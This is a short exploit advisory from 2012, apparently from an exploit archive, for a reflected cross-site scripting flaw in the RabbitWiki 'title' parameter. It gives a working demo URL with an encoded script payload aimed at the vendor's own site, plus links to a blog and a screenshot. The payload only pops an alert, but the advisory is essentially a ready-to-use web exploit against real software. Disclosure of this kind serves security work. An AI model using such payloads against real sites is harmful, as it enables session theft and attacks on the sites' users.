# Exploit Title: RabbitWiki Cross Site Scripting
# Date: 9.02.2012
# Author: Sony
# Software Link: http://www.rustyspigot.com/webmasters/s/RabbitWiki/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/rabbitwiki-cross-site-scripting.html
..................................................................

Simple Wiki.

index.php?title=[our xss is here]

Demo:

http://www.rustyspigot.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E

http://4.bp.blogspot.com/-p9gnAXoNB0I/TzPILgWo2fI/AAAAAAAAAc0/yiDtrL-Rm88/s1600/rabbit.JPG

..................................................................

InSecurity.Ro

Because we care, we're security aware!